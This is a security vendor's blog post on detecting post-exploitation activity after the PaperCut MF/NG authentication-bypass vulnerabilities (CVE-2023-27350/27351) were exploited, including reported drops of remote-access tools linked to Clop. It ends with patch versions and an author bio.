2023-05-05

PaperCuts Don't Have to Be the Worst Type of Pain

A Piece of the Puzzle

While zero-day vulnerabilities are certainly a cause for concern, the fact remains that they represent only a small piece of the larger attack chain. Rather than solely concentrating on the exploitation of a singular stage of attack, which is subject to frequent changes, it would be more beneficial to shift our focus towards the rest of the chain, which comprises of threat behaviors that are relatively more consistent. Therefore, as defenders, we must shift our focus from solely worrying about the vulnerability itself to paying more attention to the post-exploitation behaviors of threat actors. In this way, we can better understand the techniques and strategies used by attackers and improve our ability to detect and respond to a broader range of threats, including those that leverage zero-day vulnerabilities. One of the latest vulnerabilities to be highlighted is the CVE-2023-27350 and CVE-2023-27351 in PaperCut MF/NG, a print management software solution allowing for an authentication bypass, enabling remote code execution without requiring any authentication.

A release of a proof-of-concept by Zach Hanley at Horizon3 is valuable to aid in detecting the PaperCut vulnerabilities. However, our focus for threat detection is shifted towards an understanding of the adversary behavior following the exploit of the vulnerability, as an understanding of these tactics, techniques, and procedures (TTPs) is a constant staple of threat actor activity vs. the changing nature of how to exploit a single appliance/software. Researchers from Huntress have observed PaperCut servers being exploited to execute PowerShell commands to drop remote access software such as Atera and Syncro. Based on registered infrastructure dropping the software, operators from the Clop ransomware gang are involved in exploiting PaperCut servers, leading to concerns about potential ransomware attacks due to this exploit.

Finding the Path for Sequenced-based Alerting

Although short and sweet, recognizing these activity patterns is crucial in enabling us to comprehend adversary behavior and improve threat detection. By identifying the sequences of attack techniques, we better understand the attack and how to strengthen our defenses.

Through the power of sequenced-based alerting from the Anvilogic Forge, we can chain together the observed post-exploitation activity with threat identifiers from our detection armory to produce a threat scenario. Our atomic-level detections are important on their own to capture specific techniques, however when sequenced in a scenario, it tells a complete story. The creation of a sequenced-based alert from research and intelligence-gathering, enables us to readily operationalize our intel to defend against the latest threats. In addition to recognizing new patterns of threat behaviors.

*Anvilogic Threat Scenario: PS/BitsAdmin Downloads Payload for Remote Access*

Armor Up with a Fortified Detection Armory

Understanding threat behaviors means we don’t have to constantly worry about one element of the chain that changes but focus on the parts that remain constant. Threat detection provides a strong level of defense when armed with a library of adversary behaviors to detect malicious activity.
PaperCut has resolved vulnerabilities CVE-2023-27350 and CVE-2023-27351 through “PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later," as stated in their latest security advisory.

About the Forge Author

Kevin Lo is a threat researcher for the Anvilogic Forge team, where he is responsible for threat research and intelligence.

Prior to Anvilogic, Kevin was a cybersecurity analyst at a US financial institution serving roles in digital forensics, cybersecurity operations, and detection engineering. Kevin currently resides in Albany, NY. He holds a Bachelor's degree from Syracuse University in Information Management & Technology with a concentration in Information Security. Kevin holds several cybersecurity certifications with GIAC and MITRE ATT&CK.

Happy to connect with you on LinkedIn!

References: